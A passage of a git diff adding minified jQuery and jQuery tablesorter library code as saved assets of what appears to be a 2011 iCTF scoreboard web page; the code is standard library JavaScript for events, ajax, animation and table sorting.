N=RegExp("(^|\\.)"+Q.slice().sort().join(".*\\.")+"(\\.|$)");if(G[O]){if(J){delete G[O][J.guid]}else{for(var P in G[O]){if(N.test(G[O][P].type)){delete G[O][P]}}}if(o.event.specialAll[O]){o.event.specialAll[O].teardown.call(K,Q)}for(F in G[O]){break}if(!F){if(!o.event.special[O]||o.event.special[O].teardown.call(K,Q)===false){if(K.removeEventListener){K.removeEventListener(O,o.data(K,"handle"),false)}else{if(K.detachEvent){K.detachEvent("on"+O,o.data(K,"handle"))}}}F=null;delete G[O]}}})}for(F in G){break}if(!F){var L=o.data(K,"handle");if(L){L.elem=null}o.removeData(K,"events");o.removeData(K,"handle")}}},trigger:function(I,K,H,E){var G=I.type||I;if(!E){I=typeof I==="object"?I[h]?I:o.extend(o.Event(G),I):o.Event(G);if(G.indexOf("!")>=0){I.type=G=G.slice(0,-1);I.exclusive=true}if(!H){I.stopPropagation();if(this.global[G]){o.each(o.cache,function(){if(this.events&&this.events[G]){o.event.trigger(I,K,this.handle.elem)}})}}if(!H||H.nodeType==3||H.nodeType==8){return g}I.result=g;I.target=H;K=o.makeArray(K);K.unshift(I)}I.currentTarget=H;var J=o.data(H,"handle");if(J){J.apply(H,K)}if((!H[G]||(o.nodeName(H,"a")&&G=="click"))&&H["on"+G]&&H["on"+G].apply(H,K)===false){I.result=false}if(!E&&H[G]&&!I.isDefaultPrevented()&&!(o.nodeName(H,"a")&&G=="click")){this.triggered=true;try{H[G]()}catch(L){}}this.triggered=false;if(!I.isPropagationStopped()){var F=H.parentNode||H.ownerDocument;if(F){o.event.trigger(I,K,F,true)}}},handle:function(K){var J,E;K=arguments[0]=o.event.fix(K||l.event);K.currentTarget=this;var L=K.type.split(".");K.type=L.shift();J=!L.length&&!K.exclusive;var I=RegExp("(^|\\.)"+L.slice().sort().join(".*\\.")+"(\\.|$)");E=(o.data(this,"events")||{})[K.type];for(var G in E){var H=E[G];if(J||I.test(H.type)){K.handler=H;K.data=H.data;var F=H.apply(this,arguments);if(F!==g){K.result=F;if(F===false){K.preventDefault();K.stopPropagation()}}if(K.isImmediatePropagationStopped()){break}}}},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode metaKey newValue originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),fix:function(H){if(H[h]){return H}var F=H;H=o.Event(F);for(var G=this.props.length,J;G;){J=this.props[--G];H[J]=F[J]}if(!H.target){H.target=H.srcElement||document}if(H.target.nodeType==3){H.target=H.target.parentNode}if(!H.relatedTarget&&H.fromElement){H.relatedTarget=H.fromElement==H.target?H.toElement:H.fromElement}if(H.pageX==null&&H.clientX!=null){var I=document.documentElement,E=document.body;H.pageX=H.clientX+(I&&I.scrollLeft||E&&E.scrollLeft||0)-(I.clientLeft||0);H.pageY=H.clientY+(I&&I.scrollTop||E&&E.scrollTop||0)-(I.clientTop||0)}if(!H.which&&((H.charCode||H.charCode===0)?H.charCode:H.keyCode)){H.which=H.charCode||H.keyCode}if(!H.metaKey&&H.ctrlKey){H.metaKey=H.ctrlKey}if(!H.which&&H.button){H.which=(H.button&1?1:(H.button&2?3:(H.button&4?2:0)))}return H},proxy:function(F,E){E=E||function(){return F.apply(this,arguments)};E.guid=F.guid=F.guid||E.guid||this.guid++;return E},special:{ready:{setup:B,teardown:function(){}}},specialAll:{live:{setup:function(E,F){o.event.add(this,F[0],c)},teardown:function(G){if(G.length){var E=0,F=RegExp("(^|\\.)"+G[0]+"(\\.|$)");o.each((o.data(this,"events").live||{}),function(){if(F.test(this.type)){E++}});if(E<1){o.event.remove(this,G[0],c)}}}}}};o.Event=function(E){if(!this.preventDefault){return new o.Event(E)}if(E&&E.type){this.originalEvent=E;this.type=E.type}else{this.type=E}this.timeStamp=e();this[h]=true};function k(){return false}function u(){return true}o.Event.prototype={preventDefault:function(){this.isDefaultPrevented=u;var E=this.originalEvent;if(!E){return}if(E.preventDefault){E.preventDefault()}E.returnValue=false},stopPropagation:function(){this.isPropagationStopped=u;var E=this.originalEvent;if(!E){return}if(E.stopPropagation){E.stopPropagation()}E.cancelBubble=true},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=u;this.stopPropagation()},isDefaultPrevented:k,isPropagationStopped:k,isImmediatePropagationStopped:k};var a=function(F){var E=F.relatedTarget;while(E&&E!=this){try{E=E.parentNode}catch(G){E=this}}if(E!=this){F.type=F.data;o.event.handle.apply(this,arguments)}};o.each({mouseover:"mouseenter",mouseout:"mouseleave"},function(F,E){o.event.special[E]={setup:function(){o.event.add(this,F,a,E)},teardown:function(){o.event.remove(this,F,a)}}});o.fn.extend({bind:function(F,G,E){return F=="unload"?this.one(F,G,E):this.each(function(){o.event.add(this,F,E||G,E&&G)})},one:function(G,H,F){var E=o.event.proxy(F||H,function(I){o(this).unbind(I,E);return(F||H).apply(this,arguments)});return this.each(function(){o.event.add(this,G,E,F&&H)})},unbind:function(F,E){return this.each(function(){o.event.remove(this,F,E)})},trigger:function(E,F){return this.each(function(){o.event.trigger(E,F,this)})},triggerHandler:function(E,G){if(this[0]){var F=o.Event(E);F.preventDefault();F.stopPropagation();o.event.trigger(F,G,this[0]);return F.result}},toggle:function(G){var E=arguments,F=1;while(F<E.length){o.event.proxy(G,E[F++])}return this.click(o.event.proxy(G,function(H){this.lastToggle=(this.lastToggle||0)%F;H.preventDefault();return E[this.lastToggle++].apply(this,arguments)||false}))},hover:function(E,F){return this.mouseenter(E).mouseleave(F)},ready:function(E){B();if(o.isReady){E.call(document,o)}else{o.readyList.push(E)}return this},live:function(G,F){var E=o.event.proxy(F);E.guid+=this.selector+G;o(document).bind(i(G,this.selector),this.selector,E);return this},die:function(F,E){o(document).unbind(i(F,this.selector),E?{guid:E.guid+this.selector+F}:null);return this}});function c(H){var E=RegExp("(^|\\.)"+H.type+"(\\.|$)"),G=true,F=[];o.each(o.data(this,"events").live||[],function(I,J){if(E.test(J.type)){var K=o(H.target).closest(J.data)[0];if(K){F.push({elem:K,fn:J})}}});F.sort(function(J,I){return o.data(J.elem,"closest")-o.data(I.elem,"closest")});o.each(F,function(){if(this.fn.call(this.elem,H,this.fn.data)===false){return(G=false)}});return G}function i(F,E){return["live",F,E.replace(/\./g,"`").replace(/ /g,"|")].join(".")}o.extend({isReady:false,readyList:[],ready:function(){if(!o.isReady){o.isReady=true;if(o.readyList){o.each(o.readyList,function(){this.call(document,o)});o.readyList=null}o(document).triggerHandler("ready")}}});var x=false;function B(){if(x){return}x=true;if(document.addEventListener){document.addEventListener("DOMContentLoaded",function(){document.removeEventListener("DOMContentLoaded",arguments.callee,false);o.ready()},false)}else{if(document.attachEvent){document.attachEvent("onreadystatechange",function(){if(document.readyState==="complete"){document.detachEvent("onreadystatechange",arguments.callee);o.ready()}});if(document.documentElement.doScroll&&l==l.top){(function(){if(o.isReady){return}try{document.documentElement.doScroll("left")}catch(E){setTimeout(arguments.callee,0);return}o.ready()})()}}}o.event.add(l,"load",o.ready)}o.each(("blur,focus,load,resize,scroll,unload,click,dblclick,mousedown,mouseup,mousemove,mouseover,mouseout,mouseenter,mouseleave,change,select,submit,keydown,keypress,keyup,error").split(","),function(F,E){o.fn[E]=function(G){return G?this.bind(E,G):this.trigger(E)}});o(l).bind("unload",function(){for(var E in o.cache){if(E!=1&&o.cache[E].handle){o.event.remove(o.cache[E].handle.elem)}}});(function(){o.support={};var F=document.documentElement,G=document.createElement("script"),K=document.createElement("div"),J="script"+(new Date).getTime();K.style.display="none";K.innerHTML=' <link/><table></table><a href="/a" style="color:red;float:left;opacity:.5;">a</a><select><option>text</option></select><object><param/></object>';var H=K.getElementsByTagName("*"),E=K.getElementsByTagName("a")[0];if(!H||!H.length||!E){return}o.support={leadingWhitespace:K.firstChild.nodeType==3,tbody:!K.getElementsByTagName("tbody").length,objectAll:!!K.getElementsByTagName("object")[0].getElementsByTagName("*").length,htmlSerialize:!!K.getElementsByTagName("link").length,style:/red/.test(E.getAttribute("style")),hrefNormalized:E.getAttribute("href")==="/a",opacity:E.style.opacity==="0.5",cssFloat:!!E.style.cssFloat,scriptEval:false,noCloneEvent:true,boxModel:null};G.type="text/javascript";try{G.appendChild(document.createTextNode("window."+J+"=1;"))}catch(I){}F.insertBefore(G,F.firstChild);if(l[J]){o.support.scriptEval=true;delete l[J]}F.removeChild(G);if(K.attachEvent&&K.fireEvent){K.attachEvent("onclick",function(){o.support.noCloneEvent=false;K.detachEvent("onclick",arguments.callee)});K.cloneNode(true).fireEvent("onclick")}o(function(){var L=document.createElement("div");L.style.width=L.style.paddingLeft="1px";document.body.appendChild(L);o.boxModel=o.support.boxModel=L.offsetWidth===2;document.body.removeChild(L).style.display="none"})})();var w=o.support.cssFloat?"cssFloat":"styleFloat";o.props={"for":"htmlFor","class":"className","float":w,cssFloat:w,styleFloat:w,readonly:"readOnly",maxlength:"maxLength",cellspacing:"cellSpacing",rowspan:"rowSpan",tabindex:"tabIndex"};o.fn.extend({_load:o.fn.load,load:function(G,J,K){if(typeof G!=="string"){return this._load(G)}var I=G.indexOf(" ");if(I>=0){var E=G.slice(I,G.length);G=G.slice(0,I)}var H="GET";if(J){if(o.isFunction(J)){K=J;J=null}else{if(typeof J==="object"){J=o.param(J);H="POST"}}}var F=this;o.ajax({url:G,type:H,dataType:"html",data:J,complete:function(M,L){if(L=="success"||L=="notmodified"){F.html(E?o("<div/>").append(M.responseText.replace(/<script(.|\s)*?\/script>/g,"")).find(E):M.responseText)}if(K){F.each(K,[M.responseText,L,M])}}});return this},serialize:function(){return o.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?o.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||/select|textarea/i.test(this.nodeName)||/text|hidden|password|search/i.test(this.type))}).map(function(E,F){var G=o(this).val();return G==null?null:o.isArray(G)?o.map(G,function(I,H){return{name:F.name,value:I}}):{name:F.name,value:G}}).get()}});o.each("ajaxStart,ajaxStop,ajaxComplete,ajaxError,ajaxSuccess,ajaxSend".split(","),function(E,F){o.fn[F]=function(G){return this.bind(F,G)}});var r=e();o.extend({get:function(E,G,H,F){if(o.isFunction(G)){H=G;G=null}return o.ajax({type:"GET",url:E,data:G,success:H,dataType:F})},getScript:function(E,F){return o.get(E,null,F,"script")},getJSON:function(E,F,G){return o.get(E,F,G,"json")},post:function(E,G,H,F){if(o.isFunction(G)){H=G;G={}}return o.ajax({type:"POST",url:E,data:G,success:H,dataType:F})},ajaxSetup:function(E){o.extend(o.ajaxSettings,E)},ajaxSettings:{url:location.href,global:true,type:"GET",contentType:"application/x-www-form-urlencoded",processData:true,async:true,xhr:function(){return l.ActiveXObject?new ActiveXObject("Microsoft.XMLHTTP"):new XMLHttpRequest()},accepts:{xml:"application/xml, text/xml",html:"text/html",script:"text/javascript, application/javascript",json:"application/json, text/javascript",text:"text/plain",_default:"*/*"}},lastModified:{},ajax:function(M){M=o.extend(true,M,o.extend(true,{},o.ajaxSettings,M));var W,F=/=\?(&|$)/g,R,V,G=M.type.toUpperCase();if(M.data&&M.processData&&typeof M.data!=="string"){M.data=o.param(M.data)}if(M.dataType=="jsonp"){if(G=="GET"){if(!M.url.match(F)){M.url+=(M.url.match(/\?/)?"&":"?")+(M.jsonp||"callback")+"=?"}}else{if(!M.data||!M.data.match(F)){M.data=(M.data?M.data+"&":"")+(M.jsonp||"callback")+"=?"}}M.dataType="json"}if(M.dataType=="json"&&(M.data&&M.data.match(F)||M.url.match(F))){W="jsonp"+r++;if(M.data){M.data=(M.data+"").replace(F,"="+W+"$1")}M.url=M.url.replace(F,"="+W+"$1");M.dataType="script";l[W]=function(X){V=X;I();L();l[W]=g;try{delete l[W]}catch(Y){}if(H){H.removeChild(T)}}}if(M.dataType=="script"&&M.cache==null){M.cache=false}if(M.cache===false&&G=="GET"){var E=e();var U=M.url.replace(/(\?|&)_=.*?(&|$)/,"$1_="+E+"$2");M.url=U+((U==M.url)?(M.url.match(/\?/)?"&":"?")+"_="+E:"")}if(M.data&&G=="GET"){M.url+=(M.url.match(/\?/)?"&":"?")+M.data;M.data=null}if(M.global&&!o.active++){o.event.trigger("ajaxStart")}var Q=/^(\w+:)?\/\/([^\/?#]+)/.exec(M.url);if(M.dataType=="script"&&G=="GET"&&Q&&(Q[1]&&Q[1]!=location.protocol||Q[2]!=location.host)){var H=document.getElementsByTagName("head")[0];var T=document.createElement("script");T.src=M.url;if(M.scriptCharset){T.charset=M.scriptCharset}if(!W){var O=false;T.onload=T.onreadystatechange=function(){if(!O&&(!this.readyState||this.readyState=="loaded"||this.readyState=="complete")){O=true;I();L();T.onload=T.onreadystatechange=null;H.removeChild(T)}}}H.appendChild(T);return g}var K=false;var J=M.xhr();if(M.username){J.open(G,M.url,M.async,M.username,M.password)}else{J.open(G,M.url,M.async)}try{if(M.data){J.setRequestHeader("Content-Type",M.contentType)}if(M.ifModified){J.setRequestHeader("If-Modified-Since",o.lastModified[M.url]||"Thu, 01 Jan 1970 00:00:00 GMT")}J.setRequestHeader("X-Requested-With","XMLHttpRequest");J.setRequestHeader("Accept",M.dataType&&M.accepts[M.dataType]?M.accepts[M.dataType]+", */*":M.accepts._default)}catch(S){}if(M.beforeSend&&M.beforeSend(J,M)===false){if(M.global&&!--o.active){o.event.trigger("ajaxStop")}J.abort();return false}if(M.global){o.event.trigger("ajaxSend",[J,M])}var N=function(X){if(J.readyState==0){if(P){clearInterval(P);P=null;if(M.global&&!--o.active){o.event.trigger("ajaxStop")}}}else{if(!K&&J&&(J.readyState==4||X=="timeout")){K=true;if(P){clearInterval(P);P=null}R=X=="timeout"?"timeout":!o.httpSuccess(J)?"error":M.ifModified&&o.httpNotModified(J,M.url)?"notmodified":"success";if(R=="success"){try{V=o.httpData(J,M.dataType,M)}catch(Z){R="parsererror"}}if(R=="success"){var Y;try{Y=J.getResponseHeader("Last-Modified")}catch(Z){}if(M.ifModified&&Y){o.lastModified[M.url]=Y}if(!W){I()}}else{o.handleError(M,J,R)}L();if(X){J.abort()}if(M.async){J=null}}}};if(M.async){var P=setInterval(N,13);if(M.timeout>0){setTimeout(function(){if(J&&!K){N("timeout")}},M.timeout)}}try{J.send(M.data)}catch(S){o.handleError(M,J,null,S)}if(!M.async){N()}function I(){if(M.success){M.success(V,R)}if(M.global){o.event.trigger("ajaxSuccess",[J,M])}}function L(){if(M.complete){M.complete(J,R)}if(M.global){o.event.trigger("ajaxComplete",[J,M])}if(M.global&&!--o.active){o.event.trigger("ajaxStop")}}return J},handleError:function(F,H,E,G){if(F.error){F.error(H,E,G)}if(F.global){o.event.trigger("ajaxError",[H,F,G])}},active:0,httpSuccess:function(F){try{return !F.status&&location.protocol=="file:"||(F.status>=200&&F.status<300)||F.status==304||F.status==1223}catch(E){}return false},httpNotModified:function(G,E){try{var H=G.getResponseHeader("Last-Modified");return G.status==304||H==o.lastModified[E]}catch(F){}return false},httpData:function(J,H,G){var F=J.getResponseHeader("content-type"),E=H=="xml"||!H&&F&&F.indexOf("xml")>=0,I=E?J.responseXML:J.responseText;if(E&&I.documentElement.tagName=="parsererror"){throw"parsererror"}if(G&&G.dataFilter){I=G.dataFilter(I,H)}if(typeof I==="string"){if(H=="script"){o.globalEval(I)}if(H=="json"){I=l["eval"]("("+I+")")}}return I},param:function(E){var G=[];function H(I,J){G[G.length]=encodeURIComponent(I)+"="+encodeURIComponent(J)}if(o.isArray(E)||E.jquery){o.each(E,function(){H(this.name,this.value)})}else{for(var F in E){if(o.isArray(E[F])){o.each(E[F],function(){H(F,this)})}else{H(F,o.isFunction(E[F])?E[F]():E[F])}}}return G.join("&").replace(/%20/g,"+")}});var m={},n,d=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]];function t(F,E){var G={};o.each(d.concat.apply([],d.slice(0,E)),function(){G[this]=F});return G}o.fn.extend({show:function(J,L){if(J){return this.animate(t("show",3),J,L)}else{for(var H=0,F=this.length;H<F;H++){var E=o.data(this[H],"olddisplay");this[H].style.display=E||"";if(o.css(this[H],"display")==="none"){var G=this[H].tagName,K;if(m[G]){K=m[G]}else{var I=o("<"+G+" />").appendTo("body");K=I.css("display");if(K==="none"){K="block"}I.remove();m[G]=K}o.data(this[H],"olddisplay",K)}}for(var H=0,F=this.length;H<F;H++){this[H].style.display=o.data(this[H],"olddisplay")||""}return this}},hide:function(H,I){if(H){return this.animate(t("hide",3),H,I)}else{for(var G=0,F=this.length;G<F;G++){var E=o.data(this[G],"olddisplay");if(!E&&E!=="none"){o.data(this[G],"olddisplay",o.css(this[G],"display"))}}for(var G=0,F=this.length;G<F;G++){this[G].style.display="none"}return this}},_toggle:o.fn.toggle,toggle:function(G,F){var E=typeof G==="boolean";return o.isFunction(G)&&o.isFunction(F)?this._toggle.apply(this,arguments):G==null||E?this.each(function(){var H=E?G:o(this).is(":hidden");o(this)[H?"show":"hide"]()}):this.animate(t("toggle",3),G,F)},fadeTo:function(E,G,F){return this.animate({opacity:G},E,F)},animate:function(I,F,H,G){var E=o.speed(F,H,G);return this[E.queue===false?"each":"queue"](function(){var K=o.extend({},E),M,L=this.nodeType==1&&o(this).is(":hidden"),J=this;for(M in I){if(I[M]=="hide"&&L||I[M]=="show"&&!L){return K.complete.call(this)}if((M=="height"||M=="width")&&this.style){K.display=o.css(this,"display");K.overflow=this.style.overflow}}if(K.overflow!=null){this.style.overflow="hidden"}K.curAnim=o.extend({},I);o.each(I,function(O,S){var R=new o.fx(J,K,O);if(/toggle|show|hide/.test(S)){R[S=="toggle"?L?"show":"hide":S](I)}else{var Q=S.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),T=R.cur(true)||0;if(Q){var N=parseFloat(Q[2]),P=Q[3]||"px";if(P!="px"){J.style[O]=(N||1)+P;T=((N||1)/R.cur(true))*T;J.style[O]=T+P}if(Q[1]){N=((Q[1]=="-="?-1:1)*N)+T}R.custom(T,N,P)}else{R.custom(T,S,"")}}});return true})},stop:function(F,E){var G=o.timers;if(F){this.queue([])}this.each(function(){for(var H=G.length-1;H>=0;H--){if(G[H].elem==this){if(E){G[H](true)}G.splice(H,1)}}});if(!E){this.dequeue()}return this}});o.each({slideDown:t("show",1),slideUp:t("hide",1),slideToggle:t("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"}},function(E,F){o.fn[E]=function(G,H){return this.animate(F,G,H)}});o.extend({speed:function(G,H,F){var E=typeof G==="object"?G:{complete:F||!F&&H||o.isFunction(G)&&G,duration:G,easing:F&&H||H&&!o.isFunction(H)&&H};E.duration=o.fx.off?0:typeof E.duration==="number"?E.duration:o.fx.speeds[E.duration]||o.fx.speeds._default;E.old=E.complete;E.complete=function(){if(E.queue!==false){o(this).dequeue()}if(o.isFunction(E.old)){E.old.call(this)}};return E},easing:{linear:function(G,H,E,F){return E+F*G},swing:function(G,H,E,F){return((-Math.cos(G*Math.PI)/2)+0.5)*F+E}},timers:[],fx:function(F,E,G){this.options=E;this.elem=F;this.prop=G;if(!E.orig){E.orig={}}}});o.fx.prototype={update:function(){if(this.options.step){this.options.step.call(this.elem,this.now,this)}(o.fx.step[this.prop]||o.fx.step._default)(this);if((this.prop=="height"||this.prop=="width")&&this.elem.style){this.elem.style.display="block"}},cur:function(F){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null)){return this.elem[this.prop]}var E=parseFloat(o.css(this.elem,this.prop,F));return E&&E>-10000?E:parseFloat(o.curCSS(this.elem,this.prop))||0},custom:function(I,H,G){this.startTime=e();this.start=I;this.end=H;this.unit=G||this.unit||"px";this.now=this.start;this.pos=this.state=0;var E=this;function F(J){return E.step(J)}F.elem=this.elem;if(F()&&o.timers.push(F)&&!n){n=setInterval(function(){var K=o.timers;for(var J=0;J<K.length;J++){if(!K[J]()){K.splice(J--,1)}}if(!K.length){clearInterval(n);n=g}},13)}},show:function(){this.options.orig[this.prop]=o.attr(this.elem.style,this.prop);this.options.show=true;this.custom(this.prop=="width"||this.prop=="height"?1:0,this.cur());o(this.elem).show()},hide:function(){this.options.orig[this.prop]=o.attr(this.elem.style,this.prop);this.options.hide=true;this.custom(this.cur(),0)},step:function(H){var G=e();if(H||G>=this.options.duration+this.startTime){this.now=this.end;this.pos=this.state=1;this.update();this.options.curAnim[this.prop]=true;var E=true;for(var F in this.options.curAnim){if(this.options.curAnim[F]!==true){E=false}}if(E){if(this.options.display!=null){this.elem.style.overflow=this.options.overflow;this.elem.style.display=this.options.display;if(o.css(this.elem,"display")=="none"){this.elem.style.display="block"}}if(this.options.hide){o(this.elem).hide()}if(this.options.hide||this.options.show){for(var I in this.options.curAnim){o.attr(this.elem.style,I,this.options.orig[I])}}this.options.complete.call(this.elem)}return false}else{var J=G-this.startTime;this.state=J/this.options.duration;this.pos=o.easing[this.options.easing||(o.easing.swing?"swing":"linear")](this.state,J,0,1,this.options.duration);this.now=this.start+((this.end-this.start)*this.pos);this.update()}return true}};o.extend(o.fx,{speeds:{slow:600,fast:200,_default:400},step:{opacity:function(E){o.attr(E.elem.style,"opacity",E.now)},_default:function(E){if(E.elem.style&&E.elem.style[E.prop]!=null){E.elem.style[E.prop]=E.now+E.unit}else{E.elem[E.prop]=E.now}}}});if(document.documentElement.getBoundingClientRect){o.fn.offset=function(){if(!this[0]){return{top:0,left:0}}if(this[0]===this[0].ownerDocument.body){return o.offset.bodyOffset(this[0])}var G=this[0].getBoundingClientRect(),J=this[0].ownerDocument,F=J.body,E=J.documentElement,L=E.clientTop||F.clientTop||0,K=E.clientLeft||F.clientLeft||0,I=G.top+(self.pageYOffset||o.boxModel&&E.scrollTop||F.scrollTop)-L,H=G.left+(self.pageXOffset||o.boxModel&&E.scrollLeft||F.scrollLeft)-K;return{top:I,left:H}}}else{o.fn.offset=function(){if(!this[0]){return{top:0,left:0}}if(this[0]===this[0].ownerDocument.body){return o.offset.bodyOffset(this[0])}o.offset.initialized||o.offset.initialize();var J=this[0],G=J.offsetParent,F=J,O=J.ownerDocument,M,H=O.documentElement,K=O.body,L=O.defaultView,E=L.getComputedStyle(J,null),N=J.offsetTop,I=J.offsetLeft;while((J=J.parentNode)&&J!==K&&J!==H){M=L.getComputedStyle(J,null);N-=J.scrollTop,I-=J.scrollLeft;if(J===G){N+=J.offsetTop,I+=J.offsetLeft;if(o.offset.doesNotAddBorder&&!(o.offset.doesAddBorderForTableAndCells&&/^t(able|d|h)$/i.test(J.tagName))){N+=parseInt(M.borderTopWidth,10)||0,I+=parseInt(M.borderLeftWidth,10)||0}F=G,G=J.offsetParent}if(o.offset.subtractsBorderForOverflowNotVisible&&M.overflow!=="visible"){N+=parseInt(M.borderTopWidth,10)||0,I+=parseInt(M.borderLeftWidth,10)||0}E=M}if(E.position==="relative"||E.position==="static"){N+=K.offsetTop,I+=K.offsetLeft}if(E.position==="fixed"){N+=Math.max(H.scrollTop,K.scrollTop),I+=Math.max(H.scrollLeft,K.scrollLeft)}return{top:N,left:I}}}o.offset={initialize:function(){if(this.initialized){return}var L=document.body,F=document.createElement("div"),H,G,N,I,M,E,J=L.style.marginTop,K='<div style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;"><div></div></div><table style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;" cellpadding="0" cellspacing="0"><tr><td></td></tr></table>';M={position:"absolute",top:0,left:0,margin:0,border:0,width:"1px",height:"1px",visibility:"hidden"};for(E in M){F.style[E]=M[E]}F.innerHTML=K;L.insertBefore(F,L.firstChild);H=F.firstChild,G=H.firstChild,I=H.nextSibling.firstChild.firstChild;this.doesNotAddBorder=(G.offsetTop!==5);this.doesAddBorderForTableAndCells=(I.offsetTop===5);H.style.overflow="hidden",H.style.position="relative";this.subtractsBorderForOverflowNotVisible=(G.offsetTop===-5);L.style.marginTop="1px";this.doesNotIncludeMarginInBodyOffset=(L.offsetTop===0);L.style.marginTop=J;L.removeChild(F);this.initialized=true},bodyOffset:function(E){o.offset.initialized||o.offset.initialize();var G=E.offsetTop,F=E.offsetLeft;if(o.offset.doesNotIncludeMarginInBodyOffset){G+=parseInt(o.curCSS(E,"marginTop",true),10)||0,F+=parseInt(o.curCSS(E,"marginLeft",true),10)||0}return{top:G,left:F}}};o.fn.extend({position:function(){var I=0,H=0,F;if(this[0]){var G=this.offsetParent(),J=this.offset(),E=/^body|html$/i.test(G[0].tagName)?{top:0,left:0}:G.offset();J.top-=j(this,"marginTop");J.left-=j(this,"marginLeft");E.top+=j(G,"borderTopWidth");E.left+=j(G,"borderLeftWidth");F={top:J.top-E.top,left:J.left-E.left}}return F},offsetParent:function(){var E=this[0].offsetParent||document.body;while(E&&(!/^body|html$/i.test(E.tagName)&&o.css(E,"position")=="static")){E=E.offsetParent}return o(E)}});o.each(["Left","Top"],function(F,E){var G="scroll"+E;o.fn[G]=function(H){if(!this[0]){return null}return H!==g?this.each(function(){this==l||this==document?l.scrollTo(!F?H:o(l).scrollLeft(),F?H:o(l).scrollTop()):this[G]=H}):this[0]==l||this[0]==document?self[F?"pageYOffset":"pageXOffset"]||o.boxModel&&document.documentElement[G]||document.body[G]:this[0][G]}});o.each(["Height","Width"],function(I,G){var E=I?"Left":"Top",H=I?"Right":"Bottom",F=G.toLowerCase();o.fn["inner"+G]=function(){return this[0]?o.css(this[0],F,false,"padding"):null};o.fn["outer"+G]=function(K){return this[0]?o.css(this[0],F,false,K?"margin":"border"):null};var J=G.toLowerCase();o.fn[J]=function(K){return this[0]==l?document.compatMode=="CSS1Compat"&&document.documentElement["client"+G]||document.body["client"+G]:this[0]==document?Math.max(document.documentElement["client"+G],document.body["scroll"+G],document.documentElement["scroll"+G],document.body["offset"+G],document.documentElement["offset"+G]):K===g?(this.length?o.css(this[0],J):null):this.css(J,typeof K==="string"?K:K+"px")}})})(); +\ No newline at end of file diff --git a/ictf2011/scoreboard.ictf2011_end.info_files/jquery.tablesorter.min.js b/ictf2011/scoreboard.ictf2011_end.info_files/jquery.tablesorter.min.js @@ -0,0 +1,4 @@ + +(function($){$.extend({tablesorter:new +function(){var parsers=[],widgets=[];this.defaults={cssHeader:"header",cssAsc:"headerSortUp",cssDesc:"headerSortDown",cssChildRow:"expand-child",sortInitialOrder:"asc",sortMultiSortKey:"shiftKey",sortForce:null,sortAppend:null,sortLocaleCompare:true,textExtraction:"simple",parsers:{},widgets:[],widgetZebra:{css:["even","odd"]},headers:{},widthFixed:false,cancelSelection:true,sortList:[],headerList:[],dateFormat:"us",decimal:'/\.|\,/g',onRenderHeader:null,selectorHeaders:'thead th',debug:false};function benchmark(s,d){log(s+","+(new Date().getTime()-d.getTime())+"ms");}this.benchmark=benchmark;function log(s){if(typeof console!="undefined"&&typeof console.debug!="undefined"){console.log(s);}else{alert(s);}}function buildParserCache(table,$headers){if(table.config.debug){var parsersDebug="";}if(table.tBodies.length==0)return;var rows=table.tBodies[0].rows;if(rows[0]){var list=[],cells=rows[0].cells,l=cells.length;for(var i=0;i<l;i++){var p=false;if($.metadata&&($($headers[i]).metadata()&&$($headers[i]).metadata().sorter)){p=getParserById($($headers[i]).metadata().sorter);}else if((table.config.headers[i]&&table.config.headers[i].sorter)){p=getParserById(table.config.headers[i].sorter);}if(!p){p=detectParserForColumn(table,rows,-1,i);}if(table.config.debug){parsersDebug+="column:"+i+" parser:"+p.id+"\n";}list.push(p);}}if(table.config.debug){log(parsersDebug);}return list;};function detectParserForColumn(table,rows,rowIndex,cellIndex){var l=parsers.length,node=false,nodeValue=false,keepLooking=true;while(nodeValue==''&&keepLooking){rowIndex++;if(rows[rowIndex]){node=getNodeFromRowAndCellIndex(rows,rowIndex,cellIndex);nodeValue=trimAndGetNodeText(table.config,node);if(table.config.debug){log('Checking if value was empty on row:'+rowIndex);}}else{keepLooking=false;}}for(var i=1;i<l;i++){if(parsers[i].is(nodeValue,table,node)){return parsers[i];}}return parsers[0];}function getNodeFromRowAndCellIndex(rows,rowIndex,cellIndex){return rows[rowIndex].cells[cellIndex];}function trimAndGetNodeText(config,node){return $.trim(getElementText(config,node));}function getParserById(name){var l=parsers.length;for(var i=0;i<l;i++){if(parsers[i].id.toLowerCase()==name.toLowerCase()){return parsers[i];}}return false;}function buildCache(table){if(table.config.debug){var cacheTime=new Date();}var totalRows=(table.tBodies[0]&&table.tBodies[0].rows.length)||0,totalCells=(table.tBodies[0].rows[0]&&table.tBodies[0].rows[0].cells.length)||0,parsers=table.config.parsers,cache={row:[],normalized:[]};for(var i=0;i<totalRows;++i){var c=$(table.tBodies[0].rows[i]),cols=[];if(c.hasClass(table.config.cssChildRow)){cache.row[cache.row.length-1]=cache.row[cache.row.length-1].add(c);continue;}cache.row.push(c);for(var j=0;j<totalCells;++j){cols.push(parsers[j].format(getElementText(table.config,c[0].cells[j]),table,c[0].cells[j]));}cols.push(cache.normalized.length);cache.normalized.push(cols);cols=null;};if(table.config.debug){benchmark("Building cache for "+totalRows+" rows:",cacheTime);}return cache;};function getElementText(config,node){var text="";if(!node)return"";if(!config.supportsTextContent)config.supportsTextContent=node.textContent||false;if(config.textExtraction=="simple"){if(config.supportsTextContent){text=node.textContent;}else{if(node.childNodes[0]&&node.childNodes[0].hasChildNodes()){text=node.childNodes[0].innerHTML;}else{text=node.innerHTML;}}}else{if(typeof(config.textExtraction)=="function"){text=config.textExtraction(node);}else{text=$(node).text();}}return text;}function appendToTable(table,cache){if(table.config.debug){var appendTime=new Date()}var c=cache,r=c.row,n=c.normalized,totalRows=n.length,checkCell=(n[0].length-1),tableBody=$(table.tBodies[0]),rows=[];for(var i=0;i<totalRows;i++){var 